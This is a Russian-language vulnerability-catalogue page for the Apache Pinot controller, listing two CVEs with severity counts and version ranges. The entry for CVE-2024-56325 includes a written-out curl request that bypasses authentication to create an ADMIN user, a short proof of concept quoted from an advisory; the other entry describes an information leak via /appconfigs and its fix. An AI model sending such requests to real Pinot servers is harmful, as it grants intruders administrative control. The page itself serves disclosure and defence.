V
Сканер-ВС
ENRU
ГлавнаяКаталогИсточникиCWECAPECATT&CKМеры защитыПродуктыВендорыДокументация
← Вернуться к списку
Org.apache.pinotПриложениеanchore_overrides

Pinot-controller

Уязвимости
2
Эксплуатируемые
0
Макс. CVSS
9.8
Макс. EPSS
0.7666

Распределение по критичности

Критический
1
Высокий
1
Средний
0
Низкий
0

Затронутые диапазоны версий

0.1–1.0.0< 1.3

Топ уязвимостей

CVE-2024-56325Проблема обхода аутентификации Если путь не содержит / и содержит ., аутентификация не требуется. Ожидаемый пример нормального запроса и ответа curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Возврат: {"code":401,"error":"HTTP 401 Unauthorized"} Зловредный запрос и пример ответа curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Возврат: {"users":{}} Новый пользователь добавляется, обходя аутентификацию, что позволяет пользователю управлять Pinot.
CVE-2024-39676Раскрытие конфиденциальной информации неавторизованному субъекту в Apache Pinot. Эта проблема затрагивает Apache Pinot: с версии 0.1 до версии 1.0.0. Пользователям рекомендуется обновиться до версии 1.0.0 и настроить RBAC, что устраняет эту проблему. Подробности: При использовании запроса к пути «/appconfigs» к контроллеру это может привести к раскрытию конфиденциальной информации, такой как системная информация (например, arch, версия ОС), информация об окружении (например, maxHeapSize) и конфигурации Pinot (например, путь zookeeper). Эта проблема была решена с помощью Role-based Access Control https://docs.pinot.apache.org/operators/tutorials/authentication/basic-auth-access-control, так что /appConfigs` и все другие API могут быть под контролем доступа. Только авторизованные пользователи имеют к нему доступ. Обратите внимание, что пользователю необходимо добавить роль администратора в соответствии с руководством RBAC, чтобы контролировать доступ к этой конечной точке, и в будущей версии Pinot планируется добавить роль администратора по умолчанию.
Перейти к вендору →Открыть в каталоге с фильтром по продукту →